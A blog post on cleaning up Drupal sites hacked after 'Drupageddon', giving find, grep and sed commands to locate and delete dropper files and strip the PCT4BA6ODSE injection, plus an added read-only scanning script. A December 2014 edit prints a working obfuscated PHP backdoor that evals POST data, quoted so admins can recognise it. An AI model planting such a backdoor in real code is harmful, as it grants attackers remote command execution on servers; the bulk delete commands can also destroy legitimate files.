Ways to recover a hacked Drupal system with 'PCT4BA6ODSE' in its PHP files

How to un-fudge a system after you've patched it for so-called "Drupageddon"

For those seeing 'PCT4BA6ODSE' in their PHP files - I have some easy commands that scrub these hacks out of your site completely (in case you do not have backups). This will not fix the underlying issue, but if you find that your PHP files have been devoured by the hackers, this will at least clean up the files without damaging them.

This attack does two things: first, it creates NEW PHP files scattered throughout your directory structure. The files are all 494 bytes long and end in "php", so they are easy to find. Run the following command to see if you have any:

find . -size 494c -name "*.php"

...and then run this command to delete them:

find . -size 494c -name "*.php" -print0 | xargs -0 rm

And the second thing this exploit/attack does is alter EXISTING files with the malicious code. To see if any of your normal Drupal PHP files have been injected with this PCT4B code, go to the root of your site and issue the following command:

grep -Rl PCT4BA6ODSE .

This will look through your entire site for newly created or pre-existing files that have been hacked with this variant - files that will now allow outside attackers to bounce commands off your server. Assuming the result of this command indeed lists affected files, you can then run this additional command:

grep -RlZ PCT4BA6ODSE . | xargs -0 sed -i 's/<[?]php.*PCT4BA6ODSE_.*[?]>/<\?php \/\/ RECOVERED FILE - more info at AllAboutTodd.com \?>/g'

This will sweep through all affected files, removing the malicious code but saving the rest of the file. Note that sed works one line at a time and the pattern is greedy, so on each line containing the marker it replaces everything from the first <?php through the last ?>; spot-check a couple of cleaned files by hand. Make sure you have backups of your system in case something goes wrong, etc etc etc...

People have been approaching me to help save their crusty, non-archived sites, so ancient and with HUNDREDS of affected files that remediating every PHP file by hand would have taken me days. These simple commands did the trick.

Edit December 2014:

Here's another attack that has become popular; hopefully we don't need to start a list! This one reassembles the string "_POST" from the letters of "stop_" so that a plain grep for $_POST misses it, then evals whatever arrives in a POST parameter, which makes it a backdoor that takes commands straight from the request:

<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q6ae4d5'])){eval(${$s20}['q6ae4d5']);}?>

Edit March 2015:

More exploits may have been found. And the 494-byte files mentioned above are now 510 bytes, update your commands accordingly!

Still going... I have reports of patched sites (Drupal 7.32 and beyond) getting hacked now, but I suspect they were already hacked before the patch and the malicious code was lurking all this time. It seems these guys are smart enough to upload multiple exploits but to use only one family of scripts at a time, leaving the others sleeping for later after we scrub the first round out.

One trick is to run grep -Rl 'eval(' . and look at the hits that end in .php. There should be very few, and the ones you find had better line up with the stock Drupal distribution code. Try https://www.drupal.org/project/hacked to be sure. And when you find small files containing eval( and php, edit them and see if they are obfuscated. If so, nuke 'em.

Finding many more. Hacked sites are coming out of the woodwork! Some clients of mine are having trouble finding *all* the exploits, but they know approximately when the site was hacked. To search for PHP files that were created (or, more specifically, last modified) near a certain date, try this:

find . -type f -newermt 2014-10-01 ! -newermt 2014-10-31 -name "*.php"

This command will find all files (recursively) that end in .php (so they are executable from outside) which were last modified in October 2014. Note that find's second bound is exclusive: as written, the command stops at the start of 2014-10-31, so use 2014-11-01 as the second date to cover the whole month. To search instead by inode change time (ctime), which is updated when permissions or ownership change and also whenever the file is written, replace -newermt with -newerct.
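As an added example that is not part of the original post, the following bash script (GNU find, grep and touch assumed) combines the checks from the commands above into one read-only scan, and builds a small constructed tree of inert fixture files to try it on:

```shell
#!/usr/bin/env bash
# Added example, not from the original post: one pass over a site that runs the
# post's checks (dropper-sized files, the PCT4BA6ODSE marker, eval( next to an
# obfuscation helper, a last-modified window) and prints "reason<TAB>path" per
# hit. It only reports; nothing is deleted or rewritten. Needs GNU find/grep/touch.
set -u

# scan_php_tree ROOT [SINCE BEFORE]   dates as YYYY-MM-DD, BEFORE is exclusive
scan_php_tree() {
    local root=$1 since=${2:-} before=${3:-} f
    # 1. dropper files: 494 bytes in the first wave, 510 bytes later
    find "$root" -type f -name '*.php' \( -size 494c -o -size 510c \) -print0 |
        while IFS= read -r -d '' f; do printf 'dropper-size\t%s\n' "$f"; done
    # 2. the marker the attack leaves inside existing files
    grep -RlZ --include='*.php' 'PCT4BA6ODSE' "$root" 2>/dev/null |
        while IFS= read -r -d '' f; do printf 'marker\t%s\n' "$f"; done
    # 3. eval( together with a helper that obfuscated shells typically use
    grep -RlZ --include='*.php' 'eval(' "$root" 2>/dev/null |
        while IFS= read -r -d '' f; do
            if grep -qE 'strtoupper|base64_decode|\$\{\$|gzinflate|str_rot13' "$f"; then
                printf 'obfuscated-eval\t%s\n' "$f"
            fi
        done
    # 4. PHP files last modified inside [SINCE, BEFORE)
    if [ -n "$since" ] && [ -n "$before" ]; then
        find "$root" -type f -name '*.php' -newermt "$since" ! -newermt "$before" -print0 |
            while IFS= read -r -d '' f; do printf 'mtime-window\t%s\n' "$f"; done
    fi
    return 0
}

# make_sample_tree DIR: constructed, inert fixtures (no working payload) so the
# scanner can be tried offline; the 494-byte "dropper" is just filler bytes.
make_sample_tree() {
    local d=$1
    mkdir -p "$d/sites/default" "$d/modules/x"
    printf '<?php\nfunction x_menu() { return array(); }\n' > "$d/modules/x/x.php"
    printf '<?php /* constructed marker */ $PCT4BA6ODSE_x = 1; ?>\n<?php\nfunction y() {}\n' \
        > "$d/sites/default/injected.php"
    head -c 494 /dev/zero | tr '\0' 'A' > "$d/modules/drop.php"
    printf '<?php $s = strtoupper("x"); // constructed: eval( lookalike, never run\n' \
        > "$d/sites/shell_like.php"
    printf 'eval( mentioned in a text file is ignored by the scanner\n' > "$d/README.txt"
    touch -d 2014-10-15 "$d/sites/default/injected.php" "$d/modules/drop.php"
    touch -d 2015-03-01 "$d/modules/x/x.php" "$d/sites/shell_like.php"
}

# usage once sourced:  scan_php_tree /var/www/drupal 2014-10-01 2014-11-01
```

Each reported path still needs a human look before anything is deleted; a legitimate file can be exactly 494 bytes, and a contrib module may call eval( for its own reasons.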

Here's what I found once I re-encoded one of these hacked files for extended characters - looks like China is hiding content in our Drupal directories ;^)

